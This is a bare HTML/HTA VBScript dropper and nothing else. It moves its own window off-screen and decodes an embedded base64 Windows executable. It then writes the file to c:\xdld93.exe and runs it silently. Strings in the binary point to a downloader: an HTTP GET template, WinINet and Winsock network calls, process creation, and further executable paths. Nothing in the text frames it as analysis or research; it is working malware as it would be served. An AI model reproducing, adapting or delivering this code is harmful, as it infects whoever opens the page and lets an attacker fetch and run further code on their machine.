<script language=vbs>
self.MoveTo 5000,5000
x=""
x=x&"TVqAAAEAAAAEABAA//8AAEABAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
x=x&"AAAAgAAAAA4fug4AtAnNIbgBTM0hdGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v"
x=x&"ZGUuDQokAAAAAAAAAABQRQAATAECAL3BCkEAAAAAAAAAAOAAj4ELAQEyAAAAAAAAAAAAAAAAABAA"
x=x&"AAAAAAAAAAAAAABAAAAQAAAAAgAAAQAAAAAAAAADAAoAAAAAAAAwAAAAAgAAzY0AAAIAAAAAQAAA"
x=x&"AEAAAAAAAQAAAAAAAAAAABAAAAAAAAAAAAAAAAAgAADbAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
x=x&"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
x=x&"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5mbGF0AAAAlgsAAAAQAAAADAAAAAIA"
x=x&"AAAAAAAAAAAAAAAAAGAAAOAuaWRhdGEAANsBAAAAIAAAAAIAAAAOAAAAAAAAAAAAAAAAAABAAADA"
x=x&"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo"
x=x&"ADAAAGgAAEAA/xUwIEAA6G0KAABoFxJAAP8VRCBAAGgAAAQA6CAFAACFwHUIagD/FVAgQACJx4HH"
x=x&"AAgAAInFicaBxgAEAABoIAMAAFXopAQAAGj/AwAAVugxBAAAaCASQABVaKATQADoxQMAAIXAD4Wt"
x=x&"AAAAaAAAAQBXVejgBAAAPQACAAB+XVCH7mhAEkAAVegQAgAA6BIBAABo9RFAAFDofAIAAFZQ6PkB"
x=x&"AABo/wMAAFbo1gMAAGgoEkAAVuhfAgAAWFdQgcdABAAAsEO5QgAAAPOqWF9VaAEAAABQV1bozwQA"
x=x&"AGoA/xVQIEAAuR4AAABRU1P/FUQgQACFwHUg/xVMIEAAg/gCdBWD+AN0EGj0AQAA/xVgIEAAW1ni"
x=x&"1MNbWcNo/wMAAFXo4QMAAGogVei9AQAAhcB0I8YAAECJw+ip////u/8RQADon////2ggEkAA6A0D"
x=x&"AACFwHVJTUWAfQBDdPloNRJAAFboswEAAGig9wMAV1XovgUAAD0AAgAAfiNqAGoAUFdW6CYEAABo"
x=x&"QHcbAGgAAAAAVuisBAAAVv8VRCBAAGoA/xVQIEAAaPcRQABQ6O4AAABQaAgAAABQaAUAAABoAAgA"
x=x&"AP8VcCBAAFho+xFAAFDoRwEAAFBoCAAAAFBoBQAAAGgABAAA/xVwIEAAWMMgAD9zPQAmdT0AYzpc"
x=x&"UHJvZ3JhbSBGaWxlc1xwbC5leGUAYzpceC5odG0AeHd4bG9hZABceHd4bG9hZC5leGUAXG1zbGRm"
x=x&"LmV4ZQBDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0ND"
x=x&"Q0NDQ0NDQ0NDQ0NDQ0MAVlec/It8JBCLdCQUi0wkGKyEwHQDquL4McCqjUf/nV9ewgwAWotcJAjH"
x=x&"RCQI////f+jK////U//iV5z8i3wkDItEJBCLTCQU8q6FyXQFjUf/6wIxwJ1fwgwAMcBIUEBQ/3Qk"
x=x&"DOjQ////K0QkBMIEAP90JATo4f///0BQ/3QkDP90JAzosf///8IIAP90JAToxv///wFEJARb6GL/"
x=x&"////4zHASFD/dCQM/3QkDOja////wggAVlec/It0JBCLfCQUi0wkGDHAhcDzpncEcgXrBEDrAUid"
x=x&"X17CDAD/dCQE6Hf///87RCQMfQSJRCQM/3QkCOhk////O0QkDH0EiUQkDFvorv/////jaP///3//"
x=x&"dCQM/3QkDOjA////wggAVlec/It0JBCLfCQUi0wkGKyEwHQtPEF8CDxafwQsQQRhhsKH96yH94TA"
x=x&"dCQ8QXwIPFp/BCxBBGE4wnIPdxLi0OsF9gcAdAQxwOsIMcBI6wMxwECdX17CDABo////f/90JAz/"
x=x&"dCQM6JX////CCABWi3QkCDHbMcC5EAAAAIoeRoDrMHILgPsJdwb34QHY6+1ewgQAV1aLdCQQ/3Qk"
x=x&"FOib/v//icdORqxOhMB0E1f/dCQYVv9UJBiFwHXrjUb/6wIxwF5fwgwAMcCLXCQEU1BQ/xVIIEAA"
x=x&"hcB0Ev8VTCBAAD23AAAAdAUxwMIEAEDCBABWV4t0JAyLfCQQxgYAVlf/FTggQACAPgB1E1dW/xU8"
x=x&"IEAAgD4AdQbHBkM6XABfXsIIAIA4InUDQLMiUFNQ6CL+//9bk8MxyUmF23QEidkpwTtMJAx8BYtM"
x=x&"JAxJi1QkCFFQUuiN/f//w/8VNCBAALsgAAAA6Lr////oyP///8IIAP8VNCBAALsgAAAA6KL///+F"
x=x&"23QdidiAOCJ0AUhAgDggdPox2+iJ////6Jf////CCACLRCQExgAAwggAi0QkBDHbakBoABAAAFBT"
x=x&"/xVAIEAAwgQAVYnlg+wIMcBQUGoDUGoBaAAAAID/dQj/FWQgQACD+P90KTHbiV38iUX4jV38agBT"
x=x&"/3UQ/3UMUP8VaCBAAP91+P8VbCBAAItF/OsCMcCJ7F3CDABVieWD7AgxwFBQagJQagNoAAAAQP91"
x=x&"CP8VZCBAAIP4/3RsiUX4MduJXfyNVfxqAFL/dRD/dQxQ/xVUIEAA/3X4/xVsIEAAi0UUhMB0PDHA"
x=x&"UGgAAAAEagNQagNoAAAAgP91CP8VZCBAAIP4/3QhiUX4aPQBAAD/dRj/dQjoFgAAAP91+P8VbCBA"
x=x&"AItF/OsCMcCJ7F3CFABVieWB7FgEAABXnI29qPv//7mWAAAAMcDzq51fx4W4+///SAAAAI2FAPz/"
x=x&"/2gAAQAA/3UIUOj++///i10Mhdt0HmgBAAAAaAQXQABQ6Of7//9o9gIAAP91DFDo2fv//42FuPv/"
x=x&"/42dqPv//42NAPz//zHSU1BSUlJSUlJRUv8VWCBAAIXAdCyLRRCFwHQNUP+1qPv///8VXCBAAP+1"
x=x&"qPv///8VbCBAAP+1rPv///8VbCBAAInsXcIMACAAoashQACFwHQGoachQADD/wWrIUAAuAEBAACD"
x=x&"7DCLHb8hQACF23QEVFD/06OnIUAAg8Qww7kDAAAAi0QkBItcJAiLVCQMUVBTUlJTUOgtAAAAhcB0"
x=x&"BoPEEMIMAFpbWIPsDFJTUOjGAAAAhcB0BoPEEMIMAFpbWFnizDHAwgwAoa8hQACFwHUDwgwAVYnl"
x=x&"g+wYMcCJRehQUFBoBAAAAGgzGEAA/xWvIUAAhcB0eIlF7DHAUGgAAQCEUFD/dQj/dez/FbshQACF"
x=x&"wHRSiUXwi0UMiUX0i0UQiUX4hcB0NjHAiUX8jUX8UP91+P919P918P8VtyFAAIXAdBqLRfyFwHQK"
x=x&"AUX0KUX4fgvr04tFECtF+IlF6P918P8VsyFAAP917P8VsyFAAItF6InsXcIMAG0AVlWJ5YHsMAMA"
x=x&"AGbHhdD8//8CADHAiYXY/P//iYXc/P//6Kv+//+FwA+F1wEAAI2F4Pz//2j/AAAA/3UMUOgM+v//"
x=x&"jYXg/P//aC8AAABQ6Gv6//+FwA+EqgEAAIpYAYD7Lw+FngEAAIPAAolF6GgvAAAAUOhG+v//hcAP"
x=x&"hIUBAACJReTGAABoOgAAAP916Ogr+v//hcB0LonGxgYAQFDoNvv//w/IwegQZomF0vz///916P8V"
x=x&"1yFAAIXAD4RFAQAAxgY66xr/dej/FdchQACFwA+ELwEAAGbHhdL8//8AUImF1Pz//42F4P3//2hD"
x=x&"GkAAUOh8+f//i13kQ1NQ6HH5//9oSRpAAFDoZvn///916FDoXfn//2hbGkAAUOhS+f//aAYAAABo"
x=x&"AQAAAGgCAAAA/xXDIUAAg/j/D4THAAAAiUXgjZ3Q/P//aBAAAABTUP8VxyFAAIXAD4WgAAAAjbXg"
x=x&"/f//VuhA+f//UDHbU1BW/3Xg/xXLIUAAWznYD4V8AAAAi0UUiUXshcB0cot1EDHbU/917Fb/deD/"
x=x&"Fc8hQACD+AB8WnQJAcYpRex+Uevgi00UK03sg+kDi3UQgT4NCg0KdQZJg8YE6xJmgT4KCnUGQYPG"
x=x&"AusFRuLi6xJXnPyLRRQpyIlF7It9EPOknV//deD/FdMhQACLRRQrRezrC/914P8V0yFAADHAiexd"
x=x&"XsIMAEdFVCAvACBIVFRQLzEuMQ0KSG9zdDogAA0KVXNlci1BZ2VudDogcg0KQ29ubmVjdGlvbjog"
x=x&"Y2xvc2UNCg0KAL7BGkAArYXAdDSJxVb/FSggQACJxzHJSTHAh/fyrof3rYXAdOCF/3TsUFZX/xUs"
x=x&"IEAAW4kDhcB1A4lFAOvXw68hQABXSU5JTkVULmRsbACvIUAASW50ZXJuZXRPcGVuQQCzIUAASW50"
x=x&"ZXJuZXRDbG9zZUhhbmRsZQC3IUAASW50ZXJuZXRSZWFkRmlsZQC7IUAASW50ZXJuZXRPcGVuVXJs"
x=x&"QQAAAAAAvyFAAFdTMl8zMi5kbGwAvyFAAFdTQVN0YXJ0dXAAwyFAAHNvY2tldADHIUAAY29ubmVj"
x=x&"dADLIUAAc2VuZADPIUAAcmVjdgDTIUAAY2xvc2Vzb2NrZXQA1yFAAGluZXRfYWRkcgAAAAAAAAAA"
x=x&"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
x=x&"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
x=x&"AAAAAAB4IAAAKCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhSAAAJQgAAClIAAAsyAAAMUgAADUIAAA"
x=x&"6yAAAPogAAAIIQAAFyEAACYhAAA0IQAAQCEAAFEhAABnIQAAbyEAAH0hAACIIQAAliEAAAAAAABL"
x=x&"RVJORUwzMi5kbGwAAABMb2FkTGlicmFyeUEAAABHZXRQcm9jQWRkcmVzcwAAAFZpcnR1YWxMb2Nr"
x=x&"AAAAR2V0Q29tbWFuZExpbmVBAAAAR2V0VGVtcFBhdGhBAAAAR2V0V2luZG93c0RpcmVjdG9yeUEA"
x=x&"AABWaXJ0dWFsQWxsb2MAAABEZWxldGVGaWxlQQAAAENyZWF0ZU11dGV4QQAAAEdldExhc3RFcnJv"
x=x&"cgAAAEV4aXRQcm9jZXNzAAAAV3JpdGVGaWxlAAAAQ3JlYXRlUHJvY2Vzc0EAAABXYWl0Rm9yU2lu"
x=x&"Z2xlT2JqZWN0AAAAU2xlZXAAAABDcmVhdGVGaWxlQQAAAFJlYWRGaWxlAAAAQ2xvc2VIYW5kbGUA"
x=x&"AABHZXRMb2NhbGVJbmZvQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
x=x&"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
function y(byval a)
	const m="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
	dim b,c,d
	b=Len(a)
	for d=1 to b step 4
		dim e,f,g,h,i,j
		e=3
		i=0
		for f=0 to 3
			g=mid(a,d+f,1)
			if g="=" then
				e=e-1
				h=0
			else
				h=instr(m,g)-1
			end if
			i=64*i+h
		next
		i=hex(i)
		i=string(6-len(i),"0")&i
		j=chr(cbyte("&H"&mid(i,1,2)))+chr(cbyte("&H"&mid(i,3,2)))+chr(cbyte("&H"&mid(i,5,2)))
		c=c&left(j,e)
	next
	y=c
end function

p="c:\xdld93.exe"
set s=CreateObject("Scripting.FileSystemObject")
set f=s.createTextFile(p,true)
f.write y(x)
f.close
set t=CreateObject("WScript.Shell")
t.run(p)
self.close
</script>
